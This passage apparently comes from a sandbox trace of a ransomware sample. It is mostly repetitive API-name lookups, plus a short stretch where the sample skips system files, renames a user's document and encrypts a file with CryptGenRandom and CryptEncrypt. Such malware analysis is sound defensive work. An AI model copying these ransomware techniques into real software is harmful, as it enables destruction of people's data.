lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.351] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.351] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.351] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.351] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.351] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.351] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.351] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.351] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.351] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.352] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.352] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.352] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.352] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.352] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.352] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.352] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.352] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.352] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.352] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.352] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.352] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.352] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.352] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.352] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.352] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.352] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.353] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.353] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.353] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.353] lstrlenA (lpString="DELETEATOM") returned 10 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.353] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.353] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.353] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.353] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.353] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.353] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.353] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.353] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.353] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.353] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.353] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.353] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.353] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.353] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.353] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.355] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.355] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.355] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.355] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.355] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.355] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.355] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.355] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.355] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.355] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.355] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.355] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.355] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.355] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.355] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.355] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.355] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.356] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.356] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.356] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.356] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.356] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.356] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.356] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.356] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.356] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.356] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc") returned 69 [0082.356] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc.ON38CyV") returned 77 [0082.356] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ozb0saj7yhnqb-p sok.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc.ON38CyV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ozb0saj7yhnqb-p sok.doc.on38cyv"), dwFlags=0x0) returned 1 [0082.357] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.357] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.357] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.358] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x39e97110, ftCreationTime.dwHighDateTime=0x1d4c551, ftLastAccessTime.dwLowDateTime=0xd0aa4aa0, ftLastAccessTime.dwHighDateTime=0x1d4cd3c, ftLastWriteTime.dwLowDateTime=0xd0aa4aa0, ftLastWriteTime.dwHighDateTime=0x1d4cd3c, nFileSizeHigh=0x0, nFileSizeLow=0x92f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeC6-0DE.swf", cAlternateFileName="")) returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="DECRYPT-FILES.txt") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="autorun.inf") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="boot.ini") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="desktop.ini") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="ntuser.dat") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="iconcache.db") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="bootsect.bak") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="ntuser.dat.log") returned 1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="thumbs.db") returned -1 [0082.358] lstrcmpiW (lpString1="PeC6-0DE.swf", lpString2="Bootfont.bin") returned 1 [0082.358] lstrlenW (lpString="PeC6-0DE.swf") returned 12 [0082.358] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0082.358] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0082.358] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0082.358] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0082.358] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.358] lstrlenW (lpString="PeC6-0DE.swf") returned 12 [0082.358] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="PeC6-0DE.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf" [0082.358] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pec6-0de.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.359] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=37619) returned 1 [0082.359] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.359] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.359] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.359] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.359] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.359] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.359] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.360] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.361] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.361] CloseHandle (hObject=0x444) returned 1 [0082.361] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.361] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.362] CloseHandle (hObject=0x0) returned 0 [0082.362] CloseHandle (hObject=0x440) returned 1 [0082.362] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.362] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.362] GetTickCount () returned 0x114d106 [0082.363] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.363] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.363] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.363] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.363] lstrlenA (lpString="kernel32.dll") returned 12 [0082.363] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.364] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.364] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.364] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.364] lstrlenA (lpString="ADDATOMA") returned 8 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.364] lstrlenA (lpString="ADDATOMW") returned 8 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.364] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.364] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.364] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.364] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.364] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.364] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.364] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.364] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.365] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.365] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.365] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.365] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.365] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.365] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.365] lstrcpyA (in: 